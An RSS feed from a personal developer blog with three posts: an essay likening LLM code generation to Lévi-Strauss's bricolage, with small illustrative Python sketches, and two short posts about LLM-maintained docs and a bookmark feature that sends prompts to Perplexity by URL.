<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>ainoya.dev</title><description>Naoki Ainoya&apos;s personal website</description><link>https://ainoya.dev/</link><item><title>The Stochastic Bricoleur: What Lévi-Strauss Can Teach Us About Building Software with LLMs</title><link>https://ainoya.dev/posts/the-stochastic-bricoleur-what-l-vi-strauss-can-teach-us-about-building-software-with-llms/</link><guid isPermaLink="true">https://ainoya.dev/posts/the-stochastic-bricoleur-what-l-vi-strauss-can-teach-us-about-building-software-with-llms/</guid><description>Exploring the parallels between Claude Lévi-Strauss&apos;s concept of &apos;bricolage&apos; and how Large Language Models generate code, and what it means for modern software architecture.</description><pubDate>Sat, 28 Mar 2026 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;The other day I watched an LLM agent build a working API server. I gave it a short description of what I needed — a handful of endpoints, a database schema, authentication. Within minutes, the code was running. Tests passed. The thing worked.&lt;/p&gt;
&lt;p&gt;And yet I couldn&apos;t shake a particular feeling. The implementation was competent but slightly alien. It chose a middleware pattern I wouldn&apos;t have reached for. It structured the error handling in a way that was functional but not quite &lt;em&gt;mine&lt;/em&gt;. When I traced the logic, I couldn&apos;t find a single clear reason why it had assembled things in that specific order. It wasn&apos;t wrong. It was just… found, rather than designed.&lt;/p&gt;
&lt;p&gt;I&apos;ve been trying to name that feeling for a while. Recently, I think I found the word. It comes not from computer science but from a French anthropologist who died in 2009 at the age of 100. The word is &lt;em&gt;bricolage&lt;/em&gt;.&lt;/p&gt;
&lt;hr /&gt;
&lt;p&gt;In 1962, Claude Lévi-Strauss published &lt;em&gt;La Pensée sauvage&lt;/em&gt; — translated into English as &lt;em&gt;The Savage Mind&lt;/em&gt;. In it, he drew a distinction that has haunted intellectual life ever since: that between the &lt;em&gt;engineer&lt;/em&gt; and the &lt;em&gt;bricoleur&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;The engineer, in Lévi-Strauss&apos;s telling, subordinates each task to the availability of raw materials and tools conceived and procured specifically for the project at hand. If the right materials do not exist, the engineer creates or acquires them. The process moves from goals to means, and the means are purpose-built.&lt;/p&gt;
&lt;p&gt;The bricoleur is different. The bricoleur works with &quot;whatever is at hand&quot; — a finite, heterogeneous collection of tools and materials left over from previous projects. These elements were not designed for the current task. They carry traces of their prior uses. The bricoleur&apos;s universe of instruments is closed: the rules of the game are always to make do with what is already there. The bricoleur&apos;s skill lies in recombining these elements into something that works, even though the result cannot be fully derived from any single intention. Lévi-Strauss compared the process to a kaleidoscope: a closed set of glass pieces that, when shaken, produces endlessly different patterns — but never a pattern that wasn&apos;t latent in the set from the beginning.&lt;/p&gt;
&lt;p&gt;Lévi-Strauss introduced this concept to describe how mythological thought operates. Myths, he argued, do not invent new concepts from scratch. They take existing cultural elements — animals, kinship roles, natural phenomena — and rearrange them to address fundamental contradictions. The result is a kind of intellectual bricolage: functional, often brilliant, but operating within a universe of pre-existing fragments rather than creating from nothing.&lt;/p&gt;
&lt;p&gt;I want to suggest that this is among the most apt descriptions available for what happens when an LLM generates code.&lt;/p&gt;
&lt;p&gt;The training corpus is the raw material from which the closed set is distilled. The learned weights are the pre-constrained elements — statistical traces of patterns encountered during training, compressed into parameters. The output is not a recombination of the corpus itself, but a reconstruction from these traces: shaped by what was in the training data, but not a direct reassembly of it. When an LLM writes a function, it is not engineering in Lévi-Strauss&apos;s sense — it is not subordinating the task to purpose-built means. It is reaching into a vast but finite landscape of learned patterns, selecting fragments that statistically fit the current context, and assembling them into something that works. The fragments carry echoes of their origins: coding conventions absorbed from thousands of repositories, idioms from languages the model was trained on, architectural patterns internalized without attribution. The logic of the output is real, but it belongs to the statistical landscape, not to a designer.&lt;/p&gt;
&lt;p&gt;A necessary caveat before we go further. This essay borrows Lévi-Strauss&apos;s &lt;em&gt;operational&lt;/em&gt; concept — bricolage as a description of how things get made — but does not adopt his structuralist metaphysics wholesale. His broader claims — that all human cultures share universal deep structures, that synchronic analysis has priority over historical explanation — have been rightly challenged by post-structuralist, postcolonial, and Marxist anthropologists. We do not need to believe in invariant mental structures to observe that LLMs recombine pre-existing fragments within a closed set. The analogy works at the level of process, not ontology. We are borrowing Lévi-Strauss&apos;s lens, not his worldview.&lt;/p&gt;
&lt;hr /&gt;
&lt;p&gt;Once you see LLM-assisted development as bricolage, the structural parallels multiply. An important distinction is necessary here: these parallels apply most directly to the &lt;em&gt;bare model&lt;/em&gt; — the weights and architecture before any external augmentation. A bare LLM, without tools or retrieval, operates within a closed set in a way that closely mirrors Lévi-Strauss&apos;s bricoleur. Once you add RAG, tool use, or execution feedback, the system begins to break out of that closure — but the base layer remains bricolage, and understanding it as such is what makes the augmentation strategies legible. More on this later.&lt;/p&gt;
&lt;p&gt;Consider what Lévi-Strauss said about the bricoleur&apos;s repertoire: it is finite, it is heterogeneous, and its contents bear no necessary relation to the current project. This is a fitting description of a training corpus. The data that an LLM learned from was not curated for your particular problem. It is the accumulated residue of millions of prior constructions — Stack Overflow answers, GitHub repositories, blog posts, documentation — gathered without regard for coherence or purpose. The model&apos;s &quot;knowledge&quot; is not knowledge in any intentional sense; it is a stock of statistical traces whose presence is contingent on what happened to be available when the corpus was assembled.&lt;/p&gt;
&lt;p&gt;The elements carry traces of their prior uses. When an LLM generates a React component, the patterns it produces are not freshly derived from the semantics of your application. They are echoes of patterns that appeared in thousands of other applications, for thousands of other purposes. The model cannot fully separate a pattern from the context in which it was learned. This is why LLM-generated code sometimes feels subtly &lt;em&gt;off&lt;/em&gt; — not wrong, but inflected by intentions that are not yours. The traces of prior use are baked in.&lt;/p&gt;
&lt;p&gt;There is no single authoritative origin. The bricoleur&apos;s output, Lévi-Strauss observed, cannot be traced to a single source. It is a blend, an assemblage. LLM outputs share this quality. A generated function is a probabilistic composite shaped by thousands of examples, and it is rarely reducible to a single traceable origin. Of course, the human who wrote the prompt, selected the output, and edited the result has a real claim to authorship — this is not a &quot;death of the author&quot; argument. But the raw material the model works with resists attribution to any single source, and its assembly follows statistical logic rather than individual intention. This is why questions of attribution in AI-generated code are so vexed — not because the human contributed nothing, but because the output is difficult to reduce to a single author or origin.&lt;/p&gt;
&lt;p&gt;And the human using the LLM? Also a bricoleur. When you steer an agent — adjusting prompts, splicing outputs, routing through tool integrations, working around limitations — you are not engineering in any classical sense. You are tinkering. You are rearranging the outputs of a system you do not fully control, combining them with your own knowledge and constraints, producing something that works through iteration rather than derivation. The entire workflow, from model to user, is bricolage all the way down.&lt;/p&gt;
&lt;p&gt;Jacques Derrida, critiquing Lévi-Strauss in 1966, made an observation that now reads like prophecy. In his reading, the engineer is a myth produced by the bricoleur — a fiction of pure, self-originating design that no one actually inhabits. There is no pure engineer, Derrida argued. Everyone borrows concepts from an inherited repertoire. The notion that anyone constructs a system entirely from first principles is itself a fiction — a comforting story that bricoleurs tell about an idealized figure who does not exist. In the LLM era, Derrida&apos;s point has become impossible to ignore. The myth of the engineer-programmer — the developer who writes every line from pure logic, who designs before implementing, who fully understands the system they create — was never quite the whole story, even before LLMs. Anyone who has shipped production software knows that improvisation, copy-paste, and pragmatic compromise have always been part of the process. LLMs have simply made the bricolage impossible to ignore.&lt;/p&gt;
&lt;hr /&gt;
&lt;p&gt;The idea of connecting programming to bricolage is not new. And broader discussions linking LLMs to recombination or remix culture certainly exist. What I have not found, however, is a sustained argument that treats LLM-agent software development specifically through the lens of Lévi-Strauss&apos;s bricolage — with its particular emphasis on the closed set, the trace of prior use, and the kaleidoscope problem. That is the connection this essay attempts to make. The intellectual genealogy is worth tracing, both to acknowledge prior work and to locate what remains underexplored.&lt;/p&gt;
&lt;p&gt;In 1990, Sherry Turkle and Seymour Papert published &quot;Epistemological Pluralism and the Revaluation of the Concrete,&quot; in which they applied Lévi-Strauss&apos;s concept directly to programming. They identified a &quot;bricoleur style&quot; of coding: bottom-up rather than top-down, iterative rather than planned, proceeding by sculpting and rearranging rather than by specification. In their account, the bricoleur programmer works more like a painter than an architect — stepping back after each change to observe the effect before deciding what to do next. This was prescient work, but it was about &lt;em&gt;human&lt;/em&gt; programming styles — about how certain people prefer to code. It did not address the question of what happens when the code is generated by a machine whose entire mode of operation is bricolage.&lt;/p&gt;
&lt;p&gt;In 2021, Emily Bender and colleagues published &quot;On the Dangers of Stochastic Parrots,&quot; in which they argued that LLMs stitch together linguistic forms from training data based on probabilistic patterns, without engaging with meaning in the way humans do. Read this description carefully and compare it to Lévi-Strauss&apos;s account of bricolage — the recombination of pre-existing elements according to structural rules, without transparent reference to underlying intentions. The two descriptions are structurally similar. But Bender&apos;s paper never mentions Lévi-Strauss, and the &quot;stochastic parrot&quot; metaphor frames the phenomenon primarily as a deficiency — a failure to achieve true understanding. The bricolage frame offers something different: not a diagnosis of failure, but a recognition of a distinct mode of creation. Whether LLMs possess some form of internal representation or semantic structure is an active area of research; what matters for our purposes is that their &lt;em&gt;outputs&lt;/em&gt; are assembled from pre-existing patterns in a way that Lévi-Strauss would have immediately recognized.&lt;/p&gt;
&lt;p&gt;Earlier still, the biologist François Jacob applied Lévi-Strauss&apos;s concept to evolution itself. In his 1977 paper &quot;Evolution and Tinkering,&quot; Jacob argued that natural selection does not design organisms from scratch. It repurposes existing structures for new functions. Feathers evolved for thermal insulation and were later co-opted for flight. The vertebrate jaw was assembled from bones that once served as gill supports in fish. Evolution is not engineering; it is tinkering — or, in Lévi-Strauss&apos;s term, bricolage. The analogy to LLMs is direct: the model repurposes code patterns that were &quot;evolved&quot; for entirely different purposes, applying them to problems their original authors never imagined.&lt;/p&gt;
&lt;p&gt;In the research I have been able to survey, I have not found a sustained reading of LLM-agent development through the specific apparatus of Lévi-Strauss&apos;s bricolage — the closed set, the kaleidoscope, the transformation theory of &lt;em&gt;Mythologiques&lt;/em&gt;. The pieces are all in the literature; they have simply not been assembled. This essay is an attempt at that assembly — which is, of course, itself an act of bricolage.&lt;/p&gt;
&lt;hr /&gt;
&lt;p&gt;Lévi-Strauss did not stop at bricolage. In his four-volume masterwork &lt;em&gt;Mythologiques&lt;/em&gt; (1964–1971), he tracked how myths transform as they travel across cultures — from the southern tip of South America northward through the continent. A myth about the origin of fire becomes, in a neighboring culture, a myth about the origin of cooking. The narrative elements shift, but the underlying structure of oppositions — raw and cooked, nature and culture — persists through transformation. The elements are finite. The transformations are systematic. The variants are related not by descent from a common ancestor but by structural correspondence.&lt;/p&gt;
&lt;p&gt;This is what LLMs do with code. Given the same prompt, different models — or the same model at different temperatures — produce &lt;em&gt;variants&lt;/em&gt;. These variants are structurally related but locally adapted. They are not copies and they are not independent inventions. They are transformations of a shared repertoire, shaped by the statistical landscape of the training data. The corpus is the myth cycle. Each generation is a transformation, not a creation.&lt;/p&gt;
&lt;p&gt;But Lévi-Strauss&apos;s critics identified a fundamental problem with the kaleidoscope metaphor: structural closure. The kaleidoscope can produce endlessly different patterns, but it can never introduce a genuinely new element. The glass pieces are fixed. The system is closed. For innovation that transcends recombination, you need something from outside the set. This criticism maps onto a &lt;em&gt;baseline&lt;/em&gt; limitation of LLMs: a bare model, without tools, cannot reason beyond its training distribution. It can recombine brilliantly, but it cannot invent what was never in the corpus. In practice, of course, modern LLM-based systems are rarely bare — RAG, tool use, execution feedback, and external memory all breach the closure. The kaleidoscope metaphor is most useful not as a final description of what LLM systems &lt;em&gt;are&lt;/em&gt;, but as a description of the default they must be actively designed to escape.&lt;/p&gt;
&lt;p&gt;Here a fair objection must be addressed. If bricolage is defined broadly enough, any generative process qualifies, and the concept risks being unfalsifiable. This essay does not claim to have discovered a scientific law. The value of the bricolage frame is not predictive but prescriptive — it is a design heuristic. If you accept that an LLM operates within a closed set, specific architectural consequences follow. These consequences are concrete, testable, and immediately useful. The framework earns its keep not by being provably true but by generating better design decisions than the alternative framing of LLMs as &quot;imperfect engineers.&quot; The proof is in the architecture you build.&lt;/p&gt;
&lt;hr /&gt;
&lt;p&gt;So how do you escape the kaleidoscope? Three strategies, each rooted in a different theoretical response to structuralism&apos;s limits.&lt;/p&gt;
&lt;p&gt;The first is to introduce external elements. The anthropologist Tim Ingold criticized Lévi-Strauss for treating the elements of bricolage as stable and fixed. In reality, Ingold argued, creative materials are always in flux — they emerge, transform, and decay. In the LLM context, this translates to connecting the model to live data: retrieval-augmented generation, web search, tool use, API integrations. When you wire an LLM to an MCP server that queries a live database, you are injecting elements that were not in the training corpus. The glass pieces of the kaleidoscope are no longer fixed. The set is no longer fully closed. This is not a minor architectural detail — it is the primary mechanism by which LLM-based systems transcend their training distribution.&lt;/p&gt;
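&lt;p&gt;As a concrete illustration, here is a minimal sketch of that injection step. The helper name (&lt;code&gt;augment_prompt&lt;/code&gt;) and the canned snippets are hypothetical stand-ins for a real retrieval pipeline, not any particular framework&apos;s API:&lt;/p&gt;

```python
# A minimal sketch of "opening the closed set": context retrieved at
# request time, after training, is spliced into the prompt before
# generation. `augment_prompt` and the snippets are hypothetical.

def augment_prompt(task: str, retrieved_snippets: list[str]) -> str:
    """Combine fresh external elements with the task description."""
    context = "\n---\n".join(retrieved_snippets)
    return (
        "Use the following up-to-date context, which may postdate "
        "your training data:\n"
        f"{context}\n\n"
        f"Task: {task}"
    )

# Elements fetched live (e.g. via an MCP server), not baked into weights:
snippets = [
    "orders table now has a `currency` column (added 2026-01).",
    "POST /v2/orders replaces the deprecated /v1 endpoint.",
]
prompt = augment_prompt("Write a handler that creates an order.", snippets)
```

&lt;p&gt;The point of the sketch is the direction of data flow: the glass pieces now arrive from outside the kaleidoscope at the moment of generation.&lt;/p&gt;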
&lt;p&gt;The second strategy is to create feedback loops. Jacob&apos;s evolutionary tinkering offers the model here. In biological evolution, the raw material is pre-existing structures, but those structures are transformed through contact with the environment. Selection pressure reshapes the repertoire over time. In LLM agent workflows, this corresponds to the generate-test-error-regenerate cycle. The agent writes code, the runtime environment tests it, errors feed back as new input, and the agent revises. Each iteration is not merely a recombination of the original corpus — it is a recombination &lt;em&gt;informed by real-world feedback&lt;/em&gt; that was not part of the training data. Emergent properties arise that no single training example contained. This is how evolution produces novelty from tinkering, and it is how agent loops produce solutions that exceed mere pattern matching.&lt;/p&gt;
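&lt;p&gt;The loop can be sketched in a few lines. Everything here is a stand-in: the &lt;code&gt;generate&lt;/code&gt; callable fakes a model with canned attempts, and &lt;code&gt;run_tests&lt;/code&gt; plays the role of the runtime environment:&lt;/p&gt;

```python
# A sketch of the generate-test-regenerate cycle. In a real agent,
# `generate` would call an LLM and `run_tests` would execute the
# project's actual test suite; both are simplified stand-ins here.
from typing import Callable, Optional

def run_tests(code: str) -> Optional[str]:
    """Return an error message, or None if the code passes."""
    try:
        namespace: dict = {}
        exec(code, namespace)            # contact with the "environment"
        assert namespace["add"](2, 3) == 5
        return None
    except Exception as exc:
        return repr(exc)

def agent_loop(generate: Callable[[str, str], str],
               task: str, max_iters: int = 3) -> Optional[str]:
    feedback = ""
    for _ in range(max_iters):
        code = generate(task, feedback)
        error = run_tests(code)
        if error is None:
            return code                  # selection pressure satisfied
        feedback = error                 # the error re-enters the repertoire
    return None

# Canned "model": the first attempt is buggy, the revision fixes it.
attempts = iter(["def add(a, b):\n    return a - b",
                 "def add(a, b):\n    return a + b"])
solution = agent_loop(lambda task, fb: next(attempts), "implement add")
```

&lt;p&gt;The error message is the one element of the final solution that was never in the model&apos;s training set: it came from the world.&lt;/p&gt;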
&lt;p&gt;The third is to collide multiple closed systems. Derrida, in his critique of Lévi-Strauss, proposed that meaning arises not from structure alone but from &lt;em&gt;play&lt;/em&gt; (&lt;em&gt;jeu&lt;/em&gt;) — the endless displacement and substitution of elements within and between systems. In practice, this means multi-model orchestration: routing different parts of a task to different models, each trained on different data with different biases and blind spots. The interface between two closed systems produces patterns that neither system contains alone. This is not a theoretical nicety — it is a practical technique that developers are already using, often without realizing it has a name.&lt;/p&gt;
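&lt;p&gt;A minimal sketch of such routing, with hypothetical model names and stub clients in place of real API calls:&lt;/p&gt;

```python
# A sketch of multi-model orchestration: each subtask is routed to a
# different "closed system," and the interface recombines their outputs.
# The model names and stub clients are hypothetical placeholders.
from typing import Callable

Model = Callable[[str], str]

def make_stub(name: str) -> Model:
    # Stand-in for a real API client; each model has different biases.
    return lambda prompt: f"[{name}] {prompt}"

ROUTES: dict = {
    "spec":   make_stub("model-a"),   # strong at requirements analysis
    "code":   make_stub("model-b"),   # strong at implementation
    "review": make_stub("model-c"),   # strong at finding defects
}

def orchestrate(task: str) -> str:
    spec = ROUTES["spec"](f"Write a spec for: {task}")
    code = ROUTES["code"](f"Implement this spec: {spec}")
    review = ROUTES["review"](f"Review this code: {code}")
    return review

result = orchestrate("a rate limiter")
```

&lt;p&gt;Each handoff is an interface between two closed sets, which is exactly where the &lt;em&gt;play&lt;/em&gt; happens.&lt;/p&gt;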
&lt;p&gt;The deeper lesson is that the architecture around the LLM matters more than the LLM itself. The model is a kaleidoscope. What you build around it — the data pipelines, the feedback loops, the tool integrations, the orchestration layer — determines whether the output stays within the closed set or transcends it. Bricolage is not a deficiency to overcome. It is a mode of creation to design for.&lt;/p&gt;
&lt;hr /&gt;
&lt;p&gt;Now let us return to where we began — with names. What follows is interpretation, not corporate history. I have no evidence that anyone at Anthropic was thinking about Lévi-Strauss when they named their products. But the resonances are there, and they are worth reading — not as proof of intent, but as a symptom of convergence.&lt;/p&gt;
&lt;p&gt;Anthropic&apos;s AI is called Claude. The origin of the name has never been officially explained in detail; it is often read as a nod to Claude Shannon, the founder of information theory. Whether or not that reading is correct, it is a productive one. Shannon&apos;s central insight was that information is a statistical property of signals, independent of their semantic content. Meaning, for Shannon, is not what a message says but how it is structured relative to alternatives. LLMs operate on a fundamentally similar substrate — statistical structure over tokens — whatever internal representations they may or may not develop along the way.&lt;/p&gt;
&lt;p&gt;But the company is called &lt;em&gt;Anthropic&lt;/em&gt;. The word shares its Greek root — &lt;em&gt;anthropos&lt;/em&gt;, human — with &lt;em&gt;anthropologie&lt;/em&gt;, the discipline that Claude Lévi-Strauss transformed. The anthropic principle in cosmology holds that the universe appears designed because we observe it from within: the observer is constitutive of the observation. Applied to LLMs, this principle illuminates why their outputs seem intelligent — we, the observers, project meaning onto statistically structured text. The appearance of understanding is, at least in part, a property of the reader, not the writer.&lt;/p&gt;
&lt;p&gt;And then there is Constitutional AI, the training technique that defines Anthropic&apos;s approach to alignment. The model is trained to adhere to a set of principles — a constitution — that shapes its behavior from the inside. Not external rules imposed by a censor, but internal structural constraints that generate appropriate behavior across novel situations. Lévi-Strauss spent his entire career demonstrating a strikingly similar mechanism: how structural constraints — the incest taboo, the rules of myth transformation, the grammar of kinship — generate meaning and order without a designer, without a central authority, without anyone deciding what the system should produce. One can &lt;em&gt;read&lt;/em&gt; Constitutional AI as structural anthropology applied to neural networks. Whether its creators would accept that reading is another matter.&lt;/p&gt;
&lt;p&gt;But the naming goes deeper still. Consider the model tiers: Opus, Sonnet, Haiku. I am not claiming that Anthropic chose these names with Lévi-Strauss in mind. What I am claiming is that the names, once chosen, are legible through his framework in a way that illuminates something real about what the models do.&lt;/p&gt;
&lt;p&gt;Lévi-Strauss explicitly structured &lt;em&gt;Mythologiques&lt;/em&gt; as a musical composition. The first volume opens with an &quot;Ouverture&quot; and proceeds through &quot;Theme and Variations,&quot; &quot;Fugue,&quot; and &quot;Cantata.&quot; He argued that myth and music are isomorphic — both generate meaning through the simultaneous reading of a horizontal axis (melody, narrative) and a vertical axis (harmony, structural correspondences). &lt;em&gt;Opus&lt;/em&gt; — a musical work number — can be read in this lineage: the largest model as the most elaborated composition.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Sonnet&lt;/em&gt;. Fourteen lines. Fixed rhyme scheme. A volta at the turn. The sonnet is a form defined entirely by structural constraint. It does not produce meaning &lt;em&gt;despite&lt;/em&gt; its rules but &lt;em&gt;because of&lt;/em&gt; them. This is bricolage in its purest form: a closed formal system that generates infinite expression through the recombination of finite elements. It is also Constitutional AI in miniature — behavior shaped by internal rules, not external policing.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Haiku&lt;/em&gt;. Five-seven-five. Seventeen syllables. The most extreme formal compression in world poetry: maximum meaning from minimum structure. And it is a non-Western form. One can read its presence alongside the European sonnet and the Western classical opus as resonating — whether intentionally or not — with the universalism that Lévi-Strauss spent his career defending: the claim that structural creativity is not the monopoly of any single tradition.&lt;/p&gt;
&lt;p&gt;The scalar hierarchy — Opus (large), Sonnet (medium), Haiku (small) — is suggestive. In structural anthropology, the same transformational rules operate at every scale. A myth cycle spanning an entire continent and a single village folktale are governed by the same structural logic. Whether or not Anthropic intends the analogy, the architecture does embody it: the same constitutional principles shape behavior across model sizes.&lt;/p&gt;
&lt;p&gt;All three forms share a single property: finite constraint is the precondition for creative generation. An opus without form is noise. A sonnet without rules is free verse. A haiku without compression is just a sentence. Constraint is not the enemy of creation — it is its engine.&lt;/p&gt;
&lt;p&gt;Whether Anthropic&apos;s naming was deliberate or intuitive or simply coincidental, the reading holds. Every layer of the product taxonomy — company, model, tiers — &lt;em&gt;can be read as&lt;/em&gt; encoding a thesis that Lévi-Strauss, Shannon, and Jacob each arrived at from different directions: &lt;em&gt;structure without intention can produce something that functions as if it were designed&lt;/em&gt;. Evolution says yes. Myth says yes. Information theory says yes. Anthropic is betting its company on the same answer — with the addendum that the right constraints make all the difference.&lt;/p&gt;
&lt;p&gt;I am not arguing that Anthropic is secretly a structuralist enterprise. I am arguing that the problem they are working on — how to make a system behave well through internal constraints rather than external supervision — is the same problem Lévi-Strauss identified in myths, Jacob identified in evolution, and Shannon formalized in communication. The convergence is in the problem, not necessarily in the intent. Either way, it is hard to look at a company called Anthropic, making a model called Claude, trained by Constitutional AI, and tiered as Opus, Sonnet, and Haiku, and not hear echoes of &lt;em&gt;La Pensée sauvage&lt;/em&gt; — even if those echoes were never intended.&lt;/p&gt;
&lt;hr /&gt;
&lt;p&gt;There is a question at the bottom of all this, and it is not a theoretical one.&lt;/p&gt;
&lt;p&gt;The engineering mindset says: specify, design, implement, verify. The bricoleur mindset says: try, adapt, recombine, iterate. For most of the history of software, we pretended the first was what we did, even as the second was what actually happened. LLM agents have made the pretense untenable. Bricolage is now the dominant mode of software creation whether we acknowledge it or not.&lt;/p&gt;
&lt;p&gt;The question, then, is not &lt;em&gt;whether&lt;/em&gt; to be a bricoleur. You already are. The question is whether you will be a &lt;em&gt;reflective&lt;/em&gt; bricoleur — one who understands the structural closure of their tools, designs feedback loops that break it, builds architectures that multiply the interfaces between closed systems, and knows exactly when to reach outside the kaleidoscope for something the glass pieces cannot provide.&lt;/p&gt;
&lt;p&gt;One of Lévi-Strauss&apos;s key observations was that mythical thought totalizes — it takes whatever fragments are at hand and assembles them into a coherent whole. The LLM does the same thing. The difference — the only difference that matters — is what you build around it.&lt;/p&gt;
&lt;hr /&gt;
&lt;p&gt;&lt;em&gt;References:&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Lévi-Strauss, C. (1962). &lt;em&gt;La Pensée sauvage&lt;/em&gt;. Paris: Plon. [English: &lt;em&gt;The Savage Mind&lt;/em&gt;, 1966] — &lt;a href=&quot;https://web.mit.edu/allanmc/www/levistrauss.pdf&quot;&gt;Chapter 1: &quot;The Science of the Concrete&quot; (MIT)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Lévi-Strauss, C. (1964–1971). &lt;em&gt;Mythologiques&lt;/em&gt; I–IV. Paris: Plon. — &lt;a href=&quot;https://en.wikipedia.org/wiki/Mythologiques&quot;&gt;Wikipedia overview&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Derrida, J. (1967). &quot;Structure, Sign, and Play in the Discourse of the Human Sciences.&quot; In &lt;em&gt;Writing and Difference&lt;/em&gt;. — &lt;a href=&quot;http://hydra.humanities.uci.edu/derrida/sign-play.html&quot;&gt;Full text (UCI)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Jacob, F. (1977). &quot;Evolution and Tinkering.&quot; &lt;em&gt;Science&lt;/em&gt;, 196(4295), 1161–1166. — &lt;a href=&quot;https://doi.org/10.1126/science.860134&quot;&gt;Science (DOI)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Turkle, S. &amp;amp; Papert, S. (1990). &quot;Epistemological Pluralism and the Revaluation of the Concrete.&quot; &lt;em&gt;Signs&lt;/em&gt;, 16(1). — &lt;a href=&quot;https://www.papert.org/articles/EpistemologicalPluralism.html&quot;&gt;Full text (papert.org)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Bender, E. M. et al. (2021). &quot;On the Dangers of Stochastic Parrots: Can Language Models Be Too Big?&quot; &lt;em&gt;Proceedings of FAccT &apos;21&lt;/em&gt;. — &lt;a href=&quot;https://doi.org/10.1145/3442188.3445922&quot;&gt;ACM (DOI)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Baker, T. &amp;amp; Nelson, R. E. (2005). &quot;Creating Something from Nothing: Resource Construction through Entrepreneurial Bricolage.&quot; &lt;em&gt;Administrative Science Quarterly&lt;/em&gt;, 50(3). — &lt;a href=&quot;https://journals.sagepub.com/doi/10.2189/asqu.2005.50.3.329&quot;&gt;SAGE Journals (DOI)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Anthropic. (2026). &quot;Claude&apos;s New Constitution.&quot; — &lt;a href=&quot;https://www.anthropic.com/news/claude-new-constitution&quot;&gt;anthropic.com&lt;/a&gt;&lt;/p&gt;
</content:encoded></item><item><title>Building and Maintaining the Pokke Docs with Starlight and LLMs</title><link>https://ainoya.dev/posts/building-and-maintaining-the-pokke-docs-with-starlight-and-llms/</link><guid isPermaLink="true">https://ainoya.dev/posts/building-and-maintaining-the-pokke-docs-with-starlight-and-llms/</guid><description>How I use Starlight and scheduled AI tasks to generate and maintain the Pokke documentation.</description><pubDate>Thu, 26 Feb 2026 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;I built the documentation site for Pokke using Starlight, which is available at &lt;a href=&quot;https://docs.pokke.femto-cloud.com/&quot;&gt;docs.pokke.femto-cloud.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;I designed it with the intention of generating the content directly from source code and design documents using LLMs. The site is built to support both Japanese and English.&lt;/p&gt;
&lt;p&gt;Since AI tools like Jules and Codex have built-in task-scheduling features, I run them periodically to maintain the site. They automatically fix documentation errors and write updates for newly added features, which makes documentation maintenance far less of a chore.&lt;/p&gt;
</content:encoded></item><item><title>A Simple but Powerful Bookmark Feature: Routing Prompts to Your Own AI Subscriptions</title><link>https://ainoya.dev/posts/a-simple-but-powerful-bookmark-feature-routing-prompts-to-your-own-ai-subscriptions/</link><guid isPermaLink="true">https://ainoya.dev/posts/a-simple-but-powerful-bookmark-feature-routing-prompts-to-your-own-ai-subscriptions/</guid><description>How a lightweight custom URL feature in my personal bookmarking service, Pokke, enables seamless AI research while saving API costs.</description><pubDate>Thu, 19 Feb 2026 00:00:00 GMT</pubDate><content:encoded>&lt;p&gt;I recently added a very simple, yet effective feature to &lt;a href=&quot;https://pokke.femto-cloud.com/&quot;&gt;pokke&lt;/a&gt;, a personal bookmarking service I am developing.&lt;/p&gt;
&lt;p&gt;The feature lets users attach custom URL links to their saved bookmarks. Using simple variables like &lt;code&gt;{{url}}&lt;/code&gt;, &lt;code&gt;{{title}}&lt;/code&gt;, and &lt;code&gt;{{description}}&lt;/code&gt;, the system dynamically generates a link tailored to that specific bookmark.&lt;/p&gt;
&lt;p&gt;The most practical use case for this is passing a prompt with the bookmark&apos;s context directly to an AI search engine like Perplexity. For example, you can configure a custom URL like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;https://www.perplexity.ai/?q=URL%3A%20{{url}}%0Atitle%3A%20{{title}}%0Adescription%3A%20{{description}}%0APlease%20explain%20the%20content%20of%20the%20specified%20URL%20in%20detail.%0AAlso%2C%20please%20suggest%20some%20interesting%20pages%20on%20related%20topics.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Decoded, the query corresponds to the following prompt:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;URL: {{url}}
title: {{title}}
description: {{description}}
Please explain the content of the specified URL in detail.
Also, please suggest some interesting pages on related topics.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;With just one click from a saved bookmark, this instantly hands over the article&apos;s context to Perplexity, asking it to explain the content in detail and suggest related topics. It dramatically shortens the path from &quot;saving for later&quot; to actually &quot;learning from it.&quot;&lt;/p&gt;
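&lt;p&gt;Under the hood, the expansion can be as simple as string substitution plus percent-encoding. A minimal sketch follows; the function and its exact behavior are my illustration, not Pokke&apos;s actual implementation:&lt;/p&gt;

```typescript
// Expand {{url}}, {{title}}, {{description}} in a custom URL template.
// Values are percent-encoded because they land inside a query parameter.
function renderCustomUrl(
  template: string,
  bookmark: { url: string; title: string; description: string },
): string {
  return template
    .replace("{{url}}", encodeURIComponent(bookmark.url))
    .replace("{{title}}", encodeURIComponent(bookmark.title))
    .replace("{{description}}", encodeURIComponent(bookmark.description));
}

const link = renderCustomUrl("https://www.perplexity.ai/?q=URL%3A%20{{url}}", {
  url: "https://example.com/article",
  title: "An Article",
  description: "A description",
});
// link now ends with the percent-encoded bookmark URL
```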
&lt;p&gt;You might wonder why I didn&apos;t just integrate an LLM API directly into Pokke to summarize articles automatically in the background.&lt;/p&gt;
&lt;p&gt;The main advantage of using URL queries instead of backend APIs is cost efficiency: the feature leverages the user&apos;s existing SaaS subscriptions. By simply passing the query to a service the user is already paying for (like a Perplexity Pro account), I can offer advanced AI capabilities without bearing heavy LLM API costs on the service side. It is a win-win for both the developer and the user.&lt;/p&gt;
&lt;p&gt;However, there is a clear trade-off. Because it relies on external URL routing rather than a backend agent, it cannot be fully automated. The AI won&apos;t summarize the article the moment you save it; it still requires the user&apos;s manual action (a click) to trigger the process.&lt;/p&gt;
